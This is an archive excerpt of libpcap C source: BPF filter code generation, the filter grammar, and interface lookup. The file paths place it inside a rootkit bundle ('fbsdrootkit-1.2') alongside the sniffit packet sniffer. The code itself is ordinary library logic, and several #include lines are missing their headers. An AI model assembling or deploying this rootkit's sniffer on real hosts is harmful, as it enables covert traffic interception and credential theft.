switch (ip_proto) { case IPPROTO_UDP: case IPPROTO_TCP: b1 = gen_portop(port, ip_proto, dir); break; case PROTO_UNDEF: tmp = gen_portop(port, IPPROTO_TCP, dir); b1 = gen_portop(port, IPPROTO_UDP, dir); gen_or(tmp, b1); break; default: abort(); } gen_and(b0, b1); return b1; } static int lookup_proto(name, proto) char *name; int proto; { int v; switch (proto) { case Q_DEFAULT: case Q_IP: v = pcap_nametoproto(name); if (v == PROTO_UNDEF) bpf_error("unknown ip proto '%s'", name); break; case Q_LINK: /* XXX should look up h/w protocol type based on linktype */ v = pcap_nametoeproto(name); if (v == PROTO_UNDEF) bpf_error("unknown ether proto '%s'", name); break; default: v = PROTO_UNDEF; break; } return v; } static struct block * gen_proto(v, proto, dir) int v; int proto; int dir; { struct block *b0, *b1; if (dir != Q_DEFAULT) bpf_error("direction applied to 'proto'"); switch (proto) { case Q_DEFAULT: case Q_IP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)v); gen_and(b0, b1); return b1; case Q_ARP: bpf_error("arp does not encapsulate another protocol"); /* NOTREACHED */ case Q_RARP: bpf_error("rarp does not encapsulate another protocol"); /* NOTREACHED */ case Q_DECNET: bpf_error("decnet encapsulation is not specifiable"); /* NOTREACHED */ case Q_LAT: bpf_error("lat does not encapsulate another protocol"); /* NOTREACHED */ case Q_MOPRC: bpf_error("moprc does not encapsulate another protocol"); /* NOTREACHED */ case Q_MOPDL: bpf_error("mopdl does not encapsulate another protocol"); /* NOTREACHED */ case Q_LINK: return gen_linktype(v); case Q_UDP: bpf_error("'udp proto' is bogus"); /* NOTREACHED */ case Q_TCP: bpf_error("'tcp proto' is bogus"); /* NOTREACHED */ case Q_ICMP: bpf_error("'icmp proto' is bogus"); /* NOTREACHED */ default: abort(); /* NOTREACHED */ } /* NOTREACHED */ } /* * Left justify 'addr' and return its resulting network mask. 
*/ static u_long net_mask(addr) u_long *addr; { register u_long m = 0xffffffff; if (*addr) while ((*addr & 0xff000000) == 0) *addr <<= 8, m <<= 8; return m; } struct block * gen_scode(name, q) char *name; struct qual q; { int proto = q.proto; int dir = q.dir; u_char *eaddr; u_long mask, addr, **alist; struct block *b, *tmp; int port, real_proto; switch (q.addr) { case Q_NET: addr = pcap_nametonetaddr(name); if (addr == 0) bpf_error("unknown network '%s'", name); mask = net_mask(&addr); return gen_host(addr, mask, proto, dir); case Q_DEFAULT: case Q_HOST: if (proto == Q_LINK) { switch (linktype) { case DLT_EN10MB: eaddr = pcap_ether_hostton(name); if (eaddr == NULL) bpf_error("unknown ether host '%s'", name); return gen_ehostop(eaddr, dir); #ifdef FDDI case DLT_FDDI: eaddr = pcap_ether_hostton(name); if (eaddr == NULL) bpf_error("unknown FDDI host '%s'", name); return gen_fhostop(eaddr, dir); #endif default: bpf_error("only ethernet/FDDI supports link-level host name"); break; } } else if (proto == Q_DECNET) { unsigned short dn_addr = __pcap_nametodnaddr(name); /* * I don't think DECNET hosts can be multihomed, so * there is no need to build up a list of addresses */ return (gen_host(dn_addr, 0, proto, dir)); } else { alist = pcap_nametoaddr(name); if (alist == NULL || *alist == NULL) bpf_error("unknown host '%s'", name); b = gen_host(**alist++, 0xffffffffL, proto, dir); while (*alist) { tmp = gen_host(**alist++, 0xffffffffL, proto, dir); gen_or(b, tmp); b = tmp; } return b; } case Q_PORT: if (proto != Q_DEFAULT && proto != Q_UDP && proto != Q_TCP) bpf_error("illegal qualifier of 'port'"); if (pcap_nametoport(name, &port, &real_proto) == 0) bpf_error("unknown port '%s'", name); if (proto == Q_UDP) { if (real_proto == IPPROTO_TCP) bpf_error("port '%s' is tcp", name); else /* override PROTO_UNDEF */ real_proto = IPPROTO_UDP; } if (proto == Q_TCP) { if (real_proto == IPPROTO_UDP) bpf_error("port '%s' is udp", name); else /* override PROTO_UNDEF */ real_proto = 
IPPROTO_TCP; } return gen_port(port, real_proto, dir); case Q_GATEWAY: eaddr = pcap_ether_hostton(name); if (eaddr == NULL) bpf_error("unknown ether host: %s", name); alist = pcap_nametoaddr(name); if (alist == NULL || *alist == NULL) bpf_error("unknown host '%s'", name); return gen_gateway(eaddr, alist, proto, dir); case Q_PROTO: real_proto = lookup_proto(name, proto); if (real_proto >= 0) return gen_proto(real_proto, proto, dir); else bpf_error("unknown protocol: %s", name); case Q_UNDEF: syntax(); /* NOTREACHED */ } abort(); /* NOTREACHED */ } struct block * gen_ncode(v, q) u_long v; struct qual q; { u_long mask; int proto = q.proto; int dir = q.dir; switch (q.addr) { case Q_DEFAULT: case Q_HOST: case Q_NET: if (proto == Q_DECNET) return gen_host(v, 0, proto, dir); else if (proto == Q_LINK) { bpf_error("illegal link layer address"); } else { mask = net_mask(&v); return gen_host(v, mask, proto, dir); } case Q_PORT: if (proto == Q_UDP) proto = IPPROTO_UDP; else if (proto == Q_TCP) proto = IPPROTO_TCP; else if (proto == Q_DEFAULT) proto = PROTO_UNDEF; else bpf_error("illegal qualifier of 'port'"); return gen_port((int)v, proto, dir); case Q_GATEWAY: bpf_error("'gateway' requires a name"); /* NOTREACHED */ case Q_PROTO: return gen_proto((int)v, proto, dir); case Q_UNDEF: syntax(); /* NOTREACHED */ default: abort(); /* NOTREACHED */ } /* NOTREACHED */ } struct block * gen_ecode(eaddr, q) u_char *eaddr; struct qual q; { if ((q.addr == Q_HOST || q.addr == Q_DEFAULT) && q.proto == Q_LINK) { if (linktype == DLT_EN10MB) return gen_ehostop(eaddr, (int)q.dir); #ifdef FDDI if (linktype == DLT_FDDI) return gen_fhostop(eaddr, (int)q.dir); #endif } bpf_error("ethernet address used in non-ether expression"); /* NOTREACHED */ } void sappend(s0, s1) struct slist *s0, *s1; { /* * This is definitely not the best way to do this, but the * lists will rarely get long. 
*/ while (s0->next) s0 = s0->next; s0->next = s1; } static struct slist * xfer_to_x(a) struct arth *a; { struct slist *s; s = new_stmt(BPF_LDX|BPF_MEM); s->s.k = a->regno; return s; } static struct slist * xfer_to_a(a) struct arth *a; { struct slist *s; s = new_stmt(BPF_LD|BPF_MEM); s->s.k = a->regno; return s; } struct arth * gen_load(proto, index, size) int proto; struct arth *index; int size; { struct slist *s, *tmp; struct block *b; int regno = alloc_reg(); free_reg(index->regno); switch (size) { default: bpf_error("data size must be 1, 2, or 4"); case 1: size = BPF_B; break; case 2: size = BPF_H; break; case 4: size = BPF_W; break; } switch (proto) { default: bpf_error("unsupported index operation"); case Q_LINK: s = xfer_to_x(index); tmp = new_stmt(BPF_LD|BPF_IND|size); sappend(s, tmp); sappend(index->s, s); break; case Q_IP: case Q_ARP: case Q_RARP: case Q_DECNET: case Q_LAT: case Q_MOPRC: case Q_MOPDL: /* XXX Note that we assume a fixed link link header here. */ s = xfer_to_x(index); tmp = new_stmt(BPF_LD|BPF_IND|size); tmp->s.k = off_nl; sappend(s, tmp); sappend(index->s, s); b = gen_proto_abbrev(proto); if (index->b) gen_and(index->b, b); index->b = b; break; case Q_TCP: case Q_UDP: case Q_ICMP: s = new_stmt(BPF_LDX|BPF_MSH|BPF_B); s->s.k = off_nl; sappend(s, xfer_to_a(index)); sappend(s, new_stmt(BPF_ALU|BPF_ADD|BPF_X)); sappend(s, new_stmt(BPF_MISC|BPF_TAX)); sappend(s, tmp = new_stmt(BPF_LD|BPF_IND|size)); tmp->s.k = off_nl; sappend(index->s, s); gen_and(gen_proto_abbrev(proto), b = gen_ipfrag()); if (index->b) gen_and(index->b, b); index->b = b; break; } index->regno = regno; s = new_stmt(BPF_ST); s->s.k = regno; sappend(index->s, s); return index; } struct block * gen_relation(code, a0, a1, reversed) int code; struct arth *a0, *a1; int reversed; { struct slist *s0, *s1, *s2; struct block *b, *tmp; s0 = xfer_to_x(a1); s1 = xfer_to_a(a0); s2 = new_stmt(BPF_ALU|BPF_SUB|BPF_X); b = new_block(JMP(code)); if (reversed) gen_not(b); sappend(s1, s2); 
sappend(s0, s1); sappend(a1->s, s0); sappend(a0->s, a1->s); b->stmts = a0->s; free_reg(a0->regno); free_reg(a1->regno); /* 'and' together protocol checks */ if (a0->b) { if (a1->b) { gen_and(a0->b, tmp = a1->b); } else tmp = a0->b; } else tmp = a1->b; if (tmp) gen_and(tmp, b); return b; } struct arth * gen_loadlen() { int regno = alloc_reg(); struct arth *a = (struct arth *)newchunk(sizeof(*a)); struct slist *s; s = new_stmt(BPF_LD|BPF_LEN); s->next = new_stmt(BPF_ST); s->next->s.k = regno; a->s = s; a->regno = regno; return a; } struct arth * gen_loadi(val) int val; { struct arth *a; struct slist *s; int reg; a = (struct arth *)newchunk(sizeof(*a)); reg = alloc_reg(); s = new_stmt(BPF_LD|BPF_IMM); s->s.k = val; s->next = new_stmt(BPF_ST); s->next->s.k = reg; a->s = s; a->regno = reg; return a; } struct arth * gen_neg(a) struct arth *a; { struct slist *s; s = xfer_to_a(a); sappend(a->s, s); s = new_stmt(BPF_ALU|BPF_NEG); s->s.k = 0; sappend(a->s, s); s = new_stmt(BPF_ST); s->s.k = a->regno; sappend(a->s, s); return a; } struct arth * gen_arth(code, a0, a1) int code; struct arth *a0, *a1; { struct slist *s0, *s1, *s2; s0 = xfer_to_x(a1); s1 = xfer_to_a(a0); s2 = new_stmt(BPF_ALU|BPF_X|code); sappend(s1, s2); sappend(s0, s1); sappend(a1->s, s0); sappend(a0->s, a1->s); free_reg(a1->regno); s0 = new_stmt(BPF_ST); a0->regno = s0->s.k = alloc_reg(); sappend(a0->s, s0); return a0; } /* * Here we handle simple allocation of the scratch registers. * If too many registers are alloc'd, the allocator punts. */ static int regused[BPF_MEMWORDS]; static int curreg; /* * Return the next free register. */ static int alloc_reg() { int n = BPF_MEMWORDS; while (--n >= 0) { if (regused[curreg]) curreg = (curreg + 1) % BPF_MEMWORDS; else { regused[curreg] = 1; return curreg; } } bpf_error("too many registers needed to evaluate expression"); /* NOTREACHED */ } /* * Return a register to the table so it can * be used later. 
*/
static void
free_reg(n)
	int n;
{
	/* Clear the in-use flag so alloc_reg() can hand this slot out again. */
	regused[n] = 0;
}

/*
 * Build a block whose statements load the packet length and subtract
 * the constant n from it, and whose branch statement is JMP(jmp).
 */
static struct block *
gen_len(jmp, n)
	int jmp, n;
{
	struct slist *load, *sub;
	struct block *blk;

	load = new_stmt(BPF_LD|BPF_LEN);
	sub = new_stmt(BPF_ALU|BPF_SUB|BPF_K);
	sub->s.k = n;
	load->next = sub;

	blk = new_block(JMP(jmp));
	blk->stmts = load;

	return blk;
}

/*
 * Length test built from gen_len() with a BPF_JGE branch against n.
 */
struct block *
gen_greater(n)
	int n;
{
	struct block *blk = gen_len(BPF_JGE, n);

	return blk;
}

/*
 * Length test built as the negation of gen_len() with a BPF_JGT branch.
 */
struct block *
gen_less(n)
	int n;
{
	struct block *blk = gen_len(BPF_JGT, n);

	gen_not(blk);
	return blk;
}

/*
 * Generate the test for the grammar's "BYTE NUM byteop NUM" form:
 * op is one of '=', '<', '>', '|' or '&', idx is the byte offset and
 * val the constant operand.  Any other operator aborts.
 */
struct block *
gen_byteop(op, idx, val)
	int op, idx, val;
{
	struct block *blk;
	struct slist *alu;

	if (op == '=')
		return gen_cmp((u_int)idx, BPF_B, (long)val);

	if (op == '<') {
		/* "less than" is emitted as the negation of JGE */
		blk = gen_cmp((u_int)idx, BPF_B, (long)val);
		blk->s.code = JMP(BPF_JGE);
		gen_not(blk);
		return blk;
	}

	if (op == '>') {
		blk = gen_cmp((u_int)idx, BPF_B, (long)val);
		blk->s.code = JMP(BPF_JGT);
		return blk;
	}

	if (op == '|')
		alu = new_stmt(BPF_ALU|BPF_OR|BPF_K);
	else if (op == '&')
		alu = new_stmt(BPF_ALU|BPF_AND|BPF_K);
	else
		abort();

	/* Bitwise forms: ALU op with val, then a negated JEQ block */
	alu->s.k = val;
	blk = new_block(JMP(BPF_JEQ));
	blk->stmts = alu;
	gen_not(blk);

	return blk;
}

/*
 * Generate a broadcast test.  For the default/link qualifier this is a
 * destination match on the all-ones hardware address; for IP it compares
 * the host part of the word at off_nl + 16 against all-zeros and
 * all-ones, using the complement of the global netmask.
 */
struct block *
gen_broadcast(proto)
	int proto;
{
	static u_char ebroadcast[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
	struct block *is_ip, *host_zeros, *host_ones;
	u_long hostmask;

	if (proto == Q_DEFAULT || proto == Q_LINK) {
		if (linktype == DLT_EN10MB)
			return gen_ehostop(ebroadcast, Q_DST);
#ifdef FDDI
		if (linktype == DLT_FDDI)
			return gen_fhostop(ebroadcast, Q_DST);
#endif
		bpf_error("not a broadcast link");
	}

	if (proto == Q_IP) {
		is_ip = gen_linktype(ETHERTYPE_IP);
		hostmask = ~netmask;
		host_zeros = gen_mcmp(off_nl + 16, BPF_W, (long)0, hostmask);
		host_ones = gen_mcmp(off_nl + 16, BPF_W,
				     (long)(~0 & hostmask), hostmask);
		gen_or(host_zeros, host_ones);
		gen_and(is_ip, host_ones);
		return host_ones;
	}

	bpf_error("only ether/ip broadcast filters supported");
}

/*
 * Generate a multicast test.  At link level this checks the low bit of
 * one header byte (byte 0 on ethernet, byte 1 on FDDI); for IP it checks
 * that the byte at off_nl + 16 is >= 224.
 */
struct block *
gen_multicast(proto)
	int proto;
{
	struct block *is_ip, *blk;
	struct slist *ld;

	if (proto == Q_DEFAULT || proto == Q_LINK) {
		if (linktype == DLT_EN10MB || linktype == DLT_FDDI) {
			/*
			 * ether[0] & 1 != 0, or fddi[1] & 1 != 0.
			 * XXX TEST THIS: MIGHT NOT PORT PROPERLY XXX (FDDI)
			 */
			ld = new_stmt(BPF_LD|BPF_B|BPF_ABS);
			ld->s.k = (linktype == DLT_EN10MB) ? 0 : 1;
			blk = new_block(JMP(BPF_JSET));
			blk->s.k = 1;
			blk->stmts = ld;
			return blk;
		}
		/* Link not known to support multicasts */
	} else if (proto == Q_IP) {
		is_ip = gen_linktype(ETHERTYPE_IP);
		blk = gen_cmp(off_nl + 16, BPF_B, (long)224);
		blk->s.code = JMP(BPF_JGE);
		gen_and(is_ip, blk);
		return blk;
	}

	bpf_error("only IP multicast filters supported on ethernet/FDDI");
}

/*
 * Generate the test for inbound/outbound.  It lives here so it can be
 * made link-type specific.  dir == 0 means "inbound", dir == 1 means
 * "outbound"; dir is handed to gen_relation() as its 'reversed' flag.
 */
struct block *
gen_inbound(dir)
	int dir;
{
	/* Compares the byte at link offset 0 with the constant 0 */
	return gen_relation(BPF_JEQ,
			    gen_load(Q_LINK, gen_loadi(0), 1),
			    gen_loadi(0),
			    dir);
}
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/gencode.h100400 764 764 10326 6226213210 16436 0ustar dfdf/*
 * Copyright (c) 1990, 1991, 1992, 1993, 1994
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that: (1) source code distributions
 * retain the above copyright notice and this paragraph in its entirety, (2)
 * distributions including binary code include the above copyright notice and
 * this paragraph in its entirety in the documentation or other materials
 * provided with the distribution, and (3) all advertising materials mentioning
 * features or use of this software display the following acknowledgement:
 * ``This product includes software developed by the University of California,
 * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of
 * the University nor the names of its contributors may be used to endorse
 * or promote products derived from this software without specific prior
 * written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * @(#) $Header: gencode.h,v 1.20 94/06/12 14:29:30 leres Exp $ (LBL) */ /* * filter.h must be included before this file. */ /* Address qualifers. */ #define Q_HOST 1 #define Q_NET 2 #define Q_PORT 3 #define Q_GATEWAY 4 #define Q_PROTO 5 /* Protocol qualifiers. */ #define Q_LINK 1 #define Q_IP 2 #define Q_ARP 3 #define Q_RARP 4 #define Q_TCP 5 #define Q_UDP 6 #define Q_ICMP 7 #define Q_DECNET 8 #define Q_LAT 9 #define Q_MOPRC 10 #define Q_MOPDL 11 /* Directional qualifers. */ #define Q_SRC 1 #define Q_DST 2 #define Q_OR 3 #define Q_AND 4 #define Q_DEFAULT 0 #define Q_UNDEF 255 struct stmt { int code; long k; }; struct slist { struct stmt s; struct slist *next; }; /* * A bit vector to represent definition sets. We assume TOT_REGISTERS * is smaller than 8*sizeof(atomset). */ typedef u_long atomset; #define ATOMMASK(n) (1 << (n)) #define ATOMELEM(d, n) (d & ATOMMASK(n)) /* * An unbounded set. */ typedef u_long *uset; /* * Total number of atomic entities, including accumulator (A) and index (X). * We treat all these guys similarly during flow analysis. 
*/ #define N_ATOMS (BPF_MEMWORDS+2) struct edge { int id; int code; uset edom; struct block *succ; struct block *pred; struct edge *next; /* link list of incoming edges for a node */ }; struct block { int id; struct slist *stmts; /* side effect stmts */ struct stmt s; /* branch stmt */ int mark; int level; int offset; int sense; struct edge et; struct edge ef; struct block *head; struct block *link; /* link field used by optimizer */ uset dom; uset closure; struct edge *in_edges; atomset def, kill; atomset in_use; atomset out_use; long oval; long val[N_ATOMS]; }; struct arth { struct block *b; /* protocol checks */ struct slist *s; /* stmt list */ int regno; /* virtual register number of result */ }; struct qual { unsigned char addr; unsigned char proto; unsigned char dir; unsigned char pad; }; #ifndef __GNUC__ #define volatile #endif struct arth *gen_loadi(int); struct arth *gen_load(int, struct arth *, int); struct arth *gen_loadlen(void); struct arth *gen_neg(struct arth *); struct arth *gen_arth(int, struct arth *, struct arth *); void gen_and(struct block *, struct block *); void gen_or(struct block *, struct block *); void gen_not(struct block *); struct block *gen_scode(char *, struct qual); struct block *gen_ecode(u_char *, struct qual); struct block *gen_ncode(u_long, struct qual); struct block *gen_proto_abbrev(int); struct block *gen_relation(int, struct arth *, struct arth *, int); struct block *gen_less(int); struct block *gen_greater(int); struct block *gen_byteop(int, int, int); struct block *gen_broadcast(int); struct block *gen_multicast(int); struct block *gen_inbound(int); void bpf_optimize(struct block **); volatile void bpf_error(char *, ...); void finish_parse(struct block *); char *sdup(char *); struct bpf_insn *icode_to_fcode(struct block *, int *); int pcap_parse(void); void lex_init(char *); void sappend(struct slist *, struct slist *); /* XXX */ #define JT(b) ((b)->et.succ) #define JF(b) ((b)->ef.succ) 
fbsdrootkit-1.2/sniffit.0.3.3/libpcap/grammar.y100400 764 764 15233 6226213210 16503 0ustar dfdf%{ /* * Copyright (c) 1988, 1989, 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
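* */
#ifndef lint
static char rcsid[] =
    "@(#) $Header: grammar.y,v 1.39 94/06/14 20:09:25 leres Exp $ (LBL)";
#endif

/*
 * NOTE(review): the operands of the bare #include lines below are
 * missing from this copy of the file; they are kept as found.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "gencode.h"

/* Fill in the proto, dir and addr fields of a struct qual in one go. */
#define QSET(q, p, d, a) (q).proto = (p),\
			 (q).dir = (d),\
			 (q).addr = (a)

/* Number of parse errors reported through yyerror(). */
int n_errors = 0;

/* Qualifier value stored where no qualifier applies (all Q_UNDEF). */
static struct qual qerr = { Q_UNDEF, Q_UNDEF, Q_UNDEF, Q_UNDEF };

/*
 * Parser error hook: count the error and hand the message to bpf_error().
 *
 * bpf_error() takes a printf-style format (see its other callers, which
 * pass "%s" conversions), so the parser's message is passed as an
 * argument to "%s" rather than as the format itself; a '%' in the
 * message is then printed literally instead of being interpreted.
 */
static void
yyerror(char *msg)
{
	++n_errors;
	bpf_error("%s", msg);
	/* NOTREACHED */
}

#ifndef YYBISON
/*
 * Entry point for parsers other than bison: run yyparse().  The return
 * type is spelled out to match the "int pcap_parse(void);" prototype in
 * gencode.h instead of relying on implicit int.
 */
int
pcap_parse()
{
	return (yyparse());
}
#endif

%}

%union {
	int i;
	u_long h;
	u_char *e;
	char *s;
	struct stmt *stmt;
	struct arth *a;
	struct {
		struct qual q;
		struct block *b;
	} blk;
	struct block *rblk;
}

/*
 * NOTE(review): the %type and %token lines below carry no <tag> field in
 * this copy, although the actions use members of the %union above; the
 * tags appear to have been lost with the #include operands - confirm
 * against an intact copy before building.
 */
%type	expr id nid pid term rterm qid
%type	head
%type	pqual dqual aqual ndaqual
%type	arth narth
%type	byteop pname pnum relop irelop
%type	and or paren not null prog
%type	other

%token  DST SRC HOST GATEWAY
%token  NET PORT LESS GREATER PROTO BYTE
%token  ARP RARP IP TCP UDP ICMP
%token  DECNET LAT MOPRC MOPDL
%token  TK_BROADCAST TK_MULTICAST
%token  NUM INBOUND OUTBOUND
%token  LINK
%token	GEQ LEQ NEQ
%token	ID EID HID
%token	LSH RSH
%token  LEN

%type	ID
%type	EID
%type	HID
%type	NUM

%left OR AND
%nonassoc  '!'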
%left '|' %left '&' %left LSH RSH %left '+' '-' %left '*' '/' %nonassoc UMINUS %% prog: null expr { finish_parse($2.b); } | null ; null: /* null */ { $$.q = qerr; } ; expr: term | expr and term { gen_and($1.b, $3.b); $$ = $3; } | expr and id { gen_and($1.b, $3.b); $$ = $3; } | expr or term { gen_or($1.b, $3.b); $$ = $3; } | expr or id { gen_or($1.b, $3.b); $$ = $3; } ; and: AND { $$ = $0; } ; or: OR { $$ = $0; } ; id: nid | pnum { $$.b = gen_ncode((u_long)$1, $$.q = $0.q); } | paren pid ')' { $$ = $2; } ; nid: ID { $$.b = gen_scode($1, $$.q = $0.q); } | HID { /* Decide how to parse HID based on proto */ $$.q = $0.q; switch ($$.q.proto) { case Q_DECNET: $$.b = gen_ncode(__pcap_atodn((char *)$1), $$.q); break; default: $$.b = gen_ncode(__pcap_atoin((char *)$1), $$.q); break; } } | EID { $$.b = gen_ecode($1, $$.q = $0.q); } | not id { gen_not($2.b); $$ = $2; } ; not: '!' { $$ = $0; } ; paren: '(' { $$ = $0; } ; pid: nid | qid and id { gen_and($1.b, $3.b); $$ = $3; } | qid or id { gen_or($1.b, $3.b); $$ = $3; } ; qid: pnum { $$.b = gen_ncode((u_long)$1, $$.q = $0.q); } | pid ; term: rterm | not term { gen_not($2.b); $$ = $2; } ; head: pqual dqual aqual { QSET($$.q, $1, $2, $3); } | pqual dqual { QSET($$.q, $1, $2, Q_DEFAULT); } | pqual aqual { QSET($$.q, $1, Q_DEFAULT, $2); } | pqual PROTO { QSET($$.q, $1, Q_DEFAULT, Q_PROTO); } | pqual ndaqual { QSET($$.q, $1, Q_DEFAULT, $2); } ; rterm: head id { $$ = $2; } | paren expr ')' { $$.b = $2.b; $$.q = $1.q; } | pname { $$.b = gen_proto_abbrev($1); $$.q = qerr; } | arth relop arth { $$.b = gen_relation($2, $1, $3, 0); $$.q = qerr; } | arth irelop arth { $$.b = gen_relation($2, $1, $3, 1); $$.q = qerr; } | other { $$.b = $1; $$.q = qerr; } ; /* protocol level qualifiers */ pqual: pname | { $$ = Q_DEFAULT; } ; /* 'direction' qualifiers */ dqual: SRC { $$ = Q_SRC; } | DST { $$ = Q_DST; } | SRC OR DST { $$ = Q_OR; } | DST OR SRC { $$ = Q_OR; } | SRC AND DST { $$ = Q_AND; } | DST AND SRC { $$ = Q_AND; } ; /* address type 
qualifiers */ aqual: HOST { $$ = Q_HOST; } | NET { $$ = Q_NET; } | PORT { $$ = Q_PORT; } ; /* non-directional address type qualifiers */ ndaqual: GATEWAY { $$ = Q_GATEWAY; } ; pname: LINK { $$ = Q_LINK; } | IP { $$ = Q_IP; } | ARP { $$ = Q_ARP; } | RARP { $$ = Q_RARP; } | TCP { $$ = Q_TCP; } | UDP { $$ = Q_UDP; } | ICMP { $$ = Q_ICMP; } | DECNET { $$ = Q_DECNET; } | LAT { $$ = Q_LAT; } | MOPDL { $$ = Q_MOPDL; } | MOPRC { $$ = Q_MOPRC; } ; other: pqual TK_BROADCAST { $$ = gen_broadcast($1); } | pqual TK_MULTICAST { $$ = gen_multicast($1); } | LESS NUM { $$ = gen_less($2); } | GREATER NUM { $$ = gen_greater($2); } | BYTE NUM byteop NUM { $$ = gen_byteop($3, $2, $4); } | INBOUND { $$ = gen_inbound(0); } | OUTBOUND { $$ = gen_inbound(1); } ; relop: '>' { $$ = BPF_JGT; } | GEQ { $$ = BPF_JGE; } | '=' { $$ = BPF_JEQ; } ; irelop: LEQ { $$ = BPF_JGT; } | '<' { $$ = BPF_JGE; } | NEQ { $$ = BPF_JEQ; } ; arth: pnum { $$ = gen_loadi($1); } | narth ; narth: pname '[' arth ']' { $$ = gen_load($1, $3, 1); } | pname '[' arth ':' NUM ']' { $$ = gen_load($1, $3, $5); } | arth '+' arth { $$ = gen_arth(BPF_ADD, $1, $3); } | arth '-' arth { $$ = gen_arth(BPF_SUB, $1, $3); } | arth '*' arth { $$ = gen_arth(BPF_MUL, $1, $3); } | arth '/' arth { $$ = gen_arth(BPF_DIV, $1, $3); } | arth '&' arth { $$ = gen_arth(BPF_AND, $1, $3); } | arth '|' arth { $$ = gen_arth(BPF_OR, $1, $3); } | arth LSH arth { $$ = gen_arth(BPF_LSH, $1, $3); } | arth RSH arth { $$ = gen_arth(BPF_RSH, $1, $3); } | '-' arth %prec UMINUS { $$ = gen_neg($2); } | paren narth ')' { $$ = $2; } | LEN { $$ = gen_loadlen(); } ; byteop: '&' { $$ = '&'; } | '|' { $$ = '|'; } | '<' { $$ = '<'; } | '>' { $$ = '>'; } | '=' { $$ = '='; } ; pnum: NUM | paren pnum ')' { $$ = $2; } ; %% fbsdrootkit-1.2/sniffit.0.3.3/libpcap/inet.c100400 764 764 13243 6226213210 15765 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. 
* * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
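*/
#ifndef lint
static char rcsid[] =
    "@(#) $Header: inet.c,v 1.4 94/06/07 01:16:50 leres Exp $ (LBL)";
#endif

/*
 * NOTE(review): the operands of the bare #include lines below are
 * missing from this copy of the file; they are kept as found.
 */
#include
#include
#include
#include
#ifdef SOLARIS
#include
#endif

#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Not all systems have IFF_LOOPBACK */
#ifdef IFF_LOOPBACK
#define ISLOOPBACK(p) ((p)->ifr_flags & IFF_LOOPBACK)
#else
#define ISLOOPBACK(p) (strcmp((p)->ifr_name, "lo0") == 0)
#endif

/*
 * Return the name of a network interface attached to the system, or NULL
 * if none can be found.  The interface must be configured up; the
 * lowest unit number is preferred; loopback is ignored.
 *
 * On failure a message is written to errbuf.  The size of errbuf is not
 * visible here (presumably PCAP_ERRBUF_SIZE - confirm against callers);
 * every message written below is a short fixed prefix plus
 * pcap_strerror() text.
 *
 * The returned pointer refers to a static buffer that the next call
 * overwrites.
 */
char *
pcap_lookupdev(errbuf)
	register char *errbuf;
{
	register int fd, minunit, n;
	register char *cp;
	register struct ifreq *ifrp, *ifend, *ifnext, *mp;
	struct ifconf ifc;
	struct ifreq ibuf[16], ifr;
	static char device[sizeof(ifrp->ifr_name) + 1];
	char name[sizeof(ifrp->ifr_name) + 1];

	fd = socket(AF_INET, SOCK_DGRAM, 0);
	if (fd < 0) {
		(void)sprintf(errbuf, "socket: %s", pcap_strerror(errno));
		return (NULL);
	}
	ifc.ifc_len = sizeof ibuf;
	ifc.ifc_buf = (caddr_t)ibuf;

	/*
	 * Compare as int: against the unsigned sizeof a negative
	 * ifc_len would convert to a huge value and pass the check.
	 */
	if (ioctl(fd, SIOCGIFCONF, (char *)&ifc) < 0 ||
	    ifc.ifc_len < (int)sizeof(struct ifreq)) {
		(void)sprintf(errbuf, "SIOCGIFCONF: %s", pcap_strerror(errno));
		(void)close(fd);
		return (NULL);
	}
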